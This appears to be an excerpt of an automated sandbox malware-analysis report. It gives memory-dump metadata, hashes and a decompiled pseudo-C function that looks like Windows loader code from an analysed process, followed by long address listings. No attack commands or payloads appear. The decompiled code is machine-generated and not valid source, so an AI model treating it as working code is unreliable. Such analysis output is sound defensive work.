                                      0x053b59db
                                      0x00000000
                                      0x00000000
                                      0x053b59dd
                                      0x053b59dd
                                      0x053b59e1
                                      0x053b59e4
                                      0x053b59e7
                                      0x053b59ee
                                      0x053b59ee
                                      0x053b59f3
                                      0x053b59f3
                                      0x00000000
                                      0x05372186
                                      0x0537214f
                                      0x05372106
                                      0x05372266
                                      0x053720d8
                                      0x053720da
                                      0x053720e0
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ddbef06b99ffaea62d8f731a22f4d77413b2d68a99e1dab45a0bef119dd4c44
                                      • Instruction ID: 17c6150297948044bb3dcdb5c27ff98543a97cb6fe650413e784e3f7fc93d364
                                      • Opcode Fuzzy Hash: 6ddbef06b99ffaea62d8f731a22f4d77413b2d68a99e1dab45a0bef119dd4c44
                                      • Instruction Fuzzy Hash: 11F10275E083459FE735CB28C440BAB7BE6BF84324F04852DF9959B690E7B8D841CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0535D5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 87%
                                      			E0535D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x543d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E05356600(0x54352d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x5437b9c; // 0x0
							_t281 = L05364620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0538F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x5437b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x5437b8c; // 0x3591d28
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E05362280(_t200, 0x54384d8);
									_t277 =  *0x54385f4; // 0x3594108
									_t351 =  *0x54385f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x35940a0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0535FFB0(_t287, _t353, 0x54384d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0539CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E05356600(0x54352d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E05357926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x543b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E053CE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x5438472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x543b218; // 0x0
														asm("ror edi, cl");
														 *0x543b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E05362280(_t250, 0x54384d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L05383898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0535FFB0(_t293, _t353, 0x54384d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E053837F5(_t353, 0);
																}
																E05380413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E05379B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E053702D6(_t174);
																}
																L053677F0( *0x5437b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0537C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0535EC7F(_t353);
										L053719B8(_t287, 0, _t353, 0);
										_t200 = E0534F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0538B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x543b2f8; // 0x1480000
									if((_t206 |  *0x543b2fc) == 0 || ( *0x543b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x543b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E053F6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E053F6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0535E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0535EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E05389730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0535E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L05358F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E05383C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                      0x0535d5f2
                                      0x0535d5f5
                                      0x0535d5f5
                                      0x0535d5fd
                                      0x0535d600
                                      0x0535d60a
                                      0x0535d60d
                                      0x0535d617
                                      0x0535d61d
                                      0x0535d627
                                      0x0535d62e
                                      0x0535d911
                                      0x0535d913
                                      0x00000000
                                      0x0535d919
                                      0x0535d919
                                      0x0535d919
                                      0x0535d634
                                      0x0535d634
                                      0x0535d634
                                      0x0535d634
                                      0x0535d640
                                      0x0535d8bf
                                      0x00000000
                                      0x0535d646
                                      0x0535d646
                                      0x0535d64d
                                      0x0535d652
                                      0x053ab2fc
                                      0x053ab2fc
                                      0x053ab302
                                      0x053ab33b
                                      0x053ab341
                                      0x00000000
                                      0x053ab304
                                      0x053ab304
                                      0x053ab319
                                      0x053ab31e
                                      0x053ab324
                                      0x053ab326
                                      0x053ab332
                                      0x053ab347
                                      0x053ab34c
                                      0x053ab351
                                      0x053ab35a
                                      0x00000000
                                      0x053ab328
                                      0x053ab328
                                      0x00000000
                                      0x053ab328
                                      0x053ab326
                                      0x0535d658
                                      0x0535d658
                                      0x0535d65b
                                      0x0535d665
                                      0x00000000
                                      0x0535d66b
                                      0x0535d66b
                                      0x0535d66b
                                      0x0535d66b
                                      0x0535d66d
                                      0x0535d672
                                      0x0535d67a
                                      0x00000000
                                      0x00000000
                                      0x0535d680
                                      0x0535d686
                                      0x0535d8ce
                                      0x0535d8d4
                                      0x0535d8dd
                                      0x0535d8e0
                                      0x0535d68c
                                      0x0535d691
                                      0x0535d69d
                                      0x0535d6a2
                                      0x0535d6a7
                                      0x0535d6b0
                                      0x0535d6b5
                                      0x0535d6e0
                                      0x0535d6b7
                                      0x0535d6b7
                                      0x0535d6b9
                                      0x0535d6b9
                                      0x0535d6bb
                                      0x0535d6bd
                                      0x0535d6ce
                                      0x0535d6d0
                                      0x0535d6d2
                                      0x053ab363
                                      0x053ab365
                                      0x00000000
                                      0x053ab36b
                                      0x00000000
                                      0x053ab36b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0535d6bf
                                      0x0535d6bf
                                      0x0535d6e5
                                      0x0535d6e7
                                      0x0535d6e9
                                      0x0535d6ec
                                      0x0535d6ec
                                      0x0535d6ef
                                      0x0535d6f5
                                      0x0535d6f9
                                      0x0535d6fb
                                      0x0535d6fd
                                      0x0535d701
                                      0x0535d703
                                      0x0535d70a
                                      0x0535d70a
                                      0x0535d701
                                      0x0535d710
                                      0x0535d710
                                      0x0535d6c1
                                      0x0535d6c1
                                      0x0535d6c6
                                      0x053ab36d
                                      0x053ab36f
                                      0x00000000
                                      0x053ab375
                                      0x053ab375
                                      0x053ab375
                                      0x00000000
                                      0x053ab375
                                      0x00000000
                                      0x0535d6cc
                                      0x0535d6d8
                                      0x0535d6d8
                                      0x0535d6d8
                                      0x00000000
                                      0x0535d6c6
                                      0x0535d6bf
                                      0x00000000
                                      0x0535d6da
                                      0x0535d6da
                                      0x0535d716
                                      0x0535d71b
                                      0x0535d720
                                      0x0535d726
                                      0x0535d726
                                      0x0535d72d
                                      0x00000000
                                      0x0535d733
                                      0x0535d739
                                      0x0535d742
                                      0x0535d750
                                      0x0535d758
                                      0x0535d764
                                      0x0535d776
                                      0x0535d77a
                                      0x0535d783
                                      0x0535d928
                                      0x0535d92c
                                      0x0535d93d
                                      0x0535d944
                                      0x0535d94f
                                      0x0535d954
                                      0x0535d956
                                      0x0535d95f
                                      0x0535d961
                                      0x0535d973
                                      0x0535d973
                                      0x0535d956
                                      0x0535d944
                                      0x0535d92c
                                      0x0535d78b
                                      0x053ab394
                                      0x0535d791
                                      0x0535d798
                                      0x053ab3a3
                                      0x053ab3bb
                                      0x053ab3bb
                                      0x0535d7a5
                                      0x0535d866
                                      0x0535d870
                                      0x0535d884
                                      0x0535d892
                                      0x0535d898
                                      0x0535d89e
                                      0x0535d8a0
                                      0x0535d8a6
                                      0x0535d8ac
                                      0x0535d8ae
                                      0x0535d8b4
                                      0x0535d8b4
                                      0x0535d8ae
                                      0x0535d7a5
                                      0x0535d78b
                                      0x0535d7b1
                                      0x053ab3c5
                                      0x053ab3c5
                                      0x0535d7c3
                                      0x0535d7ca
                                      0x0535d7e5
                                      0x0535d7eb
                                      0x0535d8eb
                                      0x0535d8ed
                                      0x00000000
                                      0x0535d8f3
                                      0x0535d8f3
                                      0x0535d8f3
                                      0x00000000
                                      0x0535d8ed
                                      0x0535d7cc
                                      0x0535d7cc
                                      0x0535d7d2
                                      0x00000000
                                      0x0535d7d4
                                      0x0535d7d4
                                      0x0535d7d7
                                      0x0535d7df
                                      0x053ab3d4
                                      0x053ab3d9
                                      0x053ab3dc
                                      0x053ab3dc
                                      0x053ab3df
                                      0x053ab3e2
                                      0x053ab468
                                      0x053ab46d
                                      0x053ab46f
                                      0x053ab46f
                                      0x053ab475
                                      0x0535d8f8
                                      0x0535d8f9
                                      0x0535d8fd
                                      0x053ab3e8
                                      0x053ab3e8
                                      0x053ab3eb
                                      0x053ab3ed
                                      0x00000000
                                      0x053ab3ef
                                      0x053ab3ef
                                      0x053ab3f1
                                      0x053ab3f4
                                      0x053ab3fe
                                      0x053ab404
                                      0x053ab409
                                      0x053ab40e
                                      0x053ab410
                                      0x053ab410
                                      0x053ab414
                                      0x053ab414
                                      0x053ab41b
                                      0x053ab420
                                      0x053ab423
                                      0x053ab425
                                      0x053ab427
                                      0x053ab42a
                                      0x053ab42d
                                      0x053ab42d
                                      0x053ab42a
                                      0x053ab432
                                      0x053ab436
                                      0x053ab438
                                      0x053ab43b
                                      0x053ab43b
                                      0x053ab449
                                      0x053ab44e
                                      0x053ab454
                                      0x053ab458
                                      0x053ab458
                                      0x053ab45d
                                      0x00000000
                                      0x053ab45d
                                      0x053ab3ed
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0535d7df
                                      0x0535d7d2
                                      0x0535d7ca
                                      0x053ab37c
                                      0x053ab37e
                                      0x053ab385
                                      0x053ab38a
                                      0x00000000
                                      0x053ab38a
                                      0x0535d742
                                      0x0535d7f1
                                      0x0535d7f8
                                      0x053ab49b
                                      0x053ab49b
                                      0x0535d800
                                      0x0535d837
                                      0x0535d843
                                      0x0535d845
                                      0x0535d847
                                      0x0535d84a
                                      0x0535d84b
                                      0x0535d84e
                                      0x0535d857
                                      0x0535d802
                                      0x0535d802
                                      0x0535d80d
                                      0x00000000
                                      0x0535d818
                                      0x0535d818
                                      0x0535d824
                                      0x0535d831
                                      0x053ab4a5
                                      0x053ab4ab
                                      0x053ab4b3
                                      0x053ab4b8
                                      0x053ab4bb
                                      0x00000000
                                      0x053ab4c1
                                      0x053ab4c1
                                      0x053ab4c8
                                      0x00000000
                                      0x053ab4ce
                                      0x053ab4d4
                                      0x053ab4e1
                                      0x053ab4e3
                                      0x053ab4e5
                                      0x00000000
                                      0x053ab4eb
                                      0x053ab4f0
                                      0x053ab4f2
                                      0x0535dac9
                                      0x0535dacc
                                      0x0535dacf
                                      0x0535dad1
                                      0x0535dd78
                                      0x0535dd78
                                      0x0535dcf2
                                      0x00000000
                                      0x0535dad7
                                      0x0535dad9
                                      0x0535dadb
                                      0x00000000
                                      0x00000000
                                      0x0535dae1
                                      0x0535dae1
                                      0x0535dae4
                                      0x0535dae6
                                      0x053ab4f9
                                      0x053ab4f9
                                      0x053ab500
                                      0x0535daec
                                      0x0535daec
                                      0x0535daf5
                                      0x0535daf8
                                      0x0535dafb
                                      0x0535db03
                                      0x0535db11
                                      0x0535db16
                                      0x0535db19
                                      0x0535db1b
                                      0x053ab52c
                                      0x053ab531
                                      0x053ab534
                                      0x0535db21
                                      0x0535db21
                                      0x0535db24
                                      0x0535dcd9
                                      0x0535dce2
                                      0x0535dce5
                                      0x0535dd6a
                                      0x0535dd6d
                                      0x00000000
                                      0x0535dd73
                                      0x053ab51a
                                      0x053ab51c
                                      0x053ab51f
                                      0x053ab524
                                      0x00000000
                                      0x053ab524
                                      0x0535dce7
                                      0x0535dce7
                                      0x0535dce7
                                      0x00000000
                                      0x0535dce7
                                      0x00000000
                                      0x0535db2a
                                      0x0535db2c
                                      0x0535db31
                                      0x0535db33
                                      0x0535db36
                                      0x0535db39
                                      0x0535db3b
                                      0x0535db66
                                      0x0535db66
                                      0x0535db3d
                                      0x0535db3d
                                      0x0535db3e
                                      0x0535db46
                                      0x0535db47
                                      0x0535db49
                                      0x0535db4c
                                      0x0535db53
                                      0x0535db55
                                      0x0535db58
                                      0x0535db5a
                                      0x053ab50a
                                      0x053ab50f
                                      0x053ab512
                                      0x0535db60
                                      0x0535db60
                                      0x0535db63
                                      0x0535db63
                                      0x00000000
                                      0x0535db63
                                      0x0535db5a
                                      0x0535db3b
                                      0x0535db24
                                      0x0535db69
                                      0x0535db69
                                      0x0535db6c
                                      0x0535db6f
                                      0x0535db74
                                      0x053ab557
                                      0x053ab557
                                      0x053ab55e
                                      0x0535db7a
                                      0x0535db7c
                                      0x0535db7f
                                      0x0535db82
                                      0x0535db85
                                      0x00000000
                                      0x0535db8b
                                      0x0535db8b
                                      0x0535db8d
                                      0x0535db9b
                                      0x0535db9b
                                      0x0535db9d
                                      0x0535dba0
                                      0x0535dba2
                                      0x0535dba4
                                      0x0535dba7
                                      0x0535dba9
                                      0x0535dbae
                                      0x0535dbae
                                      0x0535dbb1
                                      0x0535dbb4
                                      0x0535dbb4
                                      0x0535dbb7
                                      0x0535dbba
                                      0x0535dcd2
                                      0x0535dcd4
                                      0x00000000
                                      0x0535dbc0
                                      0x0535dbc0
                                      0x0535dbd2
                                      0x0535dbd7
                                      0x0535dbda
                                      0x0535dbdd
                                      0x0535dbdf
                                      0x00000000
                                      0x0535dbe5
                                      0x0535dbe5
                                      0x0535dbee
                                      0x0535dbf1
                                      0x053ab541
                                      0x053ab544
                                      0x00000000
                                      0x053ab546
                                      0x053ab546
                                      0x00000000
                                      0x053ab546
                                      0x0535dbf7
                                      0x0535dbf7
                                      0x0535dbfd
                                      0x0535dbfd
                                      0x0535dbff
                                      0x0535dc0b
                                      0x0535dc15
                                      0x0535dc1b
                                      0x0535dc1d
                                      0x0535dc21
                                      0x0535dc21
                                      0x0535dc23
                                      0x0535dc23
                                      0x0535dc26
                                      0x0535dc29
                                      0x0535dc2b
                                      0x00000000
                                      0x00000000
                                      0x0535dc31
                                      0x0535dc34
                                      0x0535dc36
                                      0x0535dcbf
                                      0x0535dcbf
                                      0x0535dcc2
                                      0x00000000
                                      0x0535dc3c
                                      0x0535dc41
                                      0x0535dc43
                                      0x00000000
                                      0x0535dc45
                                      0x0535dc45
                                      0x0535dc47
                                      0x00000000
                                      0x0535dc4d
                                      0x0535dc4d
                                      0x0535dc50
                                      0x0535dc52
                                      0x0535dc55
                                      0x0535dcfa
                                      0x0535dcfe
                                      0x0535dd08
                                      0x0535dd0a
                                      0x0535dd0c
                                      0x00000000
                                      0x0535dd12
                                      0x0535dd15
                                      0x0535dd2d
                                      0x0535dd2f
                                      0x0535dd32
                                      0x0535dd35
                                      0x00000000
                                      0x0535dd35
                                      0x0535dc5b
                                      0x0535dc5b
                                      0x0535dc5e
                                      0x0535dc61
                                      0x0535dc64
                                      0x0535dc67
                                      0x0535dc67
                                      0x0535dc6a
                                      0x0535dc6c
                                      0x0535dc8e
                                      0x0535dc8e
                                      0x0535dc91
                                      0x0535dc93
                                      0x0535dcce
                                      0x0535dcce
                                      0x0535dc95
                                      0x0535dc9c
                                      0x0535dc6e
                                      0x0535dc72
                                      0x0535dc75
                                      0x0535dc77
                                      0x0535dc79
                                      0x053ab551
                                      0x053ab551
                                      0x00000000
                                      0x0535dc7f
                                      0x0535dc7f
                                      0x0535dc81
                                      0x00000000
                                      0x0535dc83
                                      0x0535dc86
                                      0x0535dc88
                                      0x00000000
                                      0x00000000
                                      0x00000000
